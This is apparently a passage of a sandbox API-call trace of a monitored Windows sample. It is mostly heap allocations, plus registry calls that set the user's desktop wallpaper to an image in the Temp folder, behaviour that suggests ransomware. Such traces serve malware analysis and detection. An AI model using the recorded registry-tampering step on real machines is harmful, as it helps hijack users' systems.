[0264.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0264.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0264.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0264.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0264.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0264.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0264.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0264.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0264.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0264.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0264.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0264.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0264.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0264.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0264.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0264.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0264.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0264.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0264.124] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0264.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0264.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0264.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4e8 [0264.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0264.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0264.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab650 [0264.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0264.125] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0264.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0264.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eaea0 [0264.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0264.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0264.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0264.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0264.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0264.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0264.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0264.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0264.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0264.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0264.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0264.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0264.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0264.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0264.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0264.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eaea0 | out: hHeap=0x2af0000) returned 1 [0264.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0264.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0264.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0264.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0264.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0264.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0264.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0264.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0264.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0264.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0264.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0264.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0264.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0264.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73488 [0264.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0264.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0264.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0264.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0264.132] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0264.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0264.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0264.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0264.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0264.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0264.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0264.134] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x3c0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0264.135] RegSetValueExW (in: hKey=0x3c0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0264.210] RegCloseKey (hKey=0x3c0) returned 0x0 [0264.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73488 | out: hHeap=0x2af0000) returned 1 [0264.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0264.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0264.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0264.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0264.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0264.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0264.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0264.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0264.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0264.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0264.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0264.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0264.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0264.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0264.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0264.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0264.211] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0264.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0264.212] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0264.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0264.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0264.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0264.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72218 [0264.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0264.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0264.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0264.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0264.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72228 [0264.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0264.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0264.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0264.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0264.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0264.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0264.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0264.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0264.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0264.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0264.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0264.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6e0 [0264.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0264.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0264.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0264.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0264.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0264.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0264.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0264.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0264.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0264.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0264.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0264.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0264.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0264.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6f8 [0264.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4d0 [0264.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0264.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0264.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0264.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0264.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0264.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0264.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0264.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0264.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0264.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0264.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0264.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0264.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0264.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5a8 [0264.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0264.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0264.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0264.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0264.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0264.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0264.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0264.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0264.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0264.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0264.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0264.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0264.220] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0264.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0264.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0264.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0264.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0264.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0264.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0264.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0264.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0264.269] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0264.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0264.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0264.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0264.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0264.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0264.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0264.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0264.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0264.273] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0264.273] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0264.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0264.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0264.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0264.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0264.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0264.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0264.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0264.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0264.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0264.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0264.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0264.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0264.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0264.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0264.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0264.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0264.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0264.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0264.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0264.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0264.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0264.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0264.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0264.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0264.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0264.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0264.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0264.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0264.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0264.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0264.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0264.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0264.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0264.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0264.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0264.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0264.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0264.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0264.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0264.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0264.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0264.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0264.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0264.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0264.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0264.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0264.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0264.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0264.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0264.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0264.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0264.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0264.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0264.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0264.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0264.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0264.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0264.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0264.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0264.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: 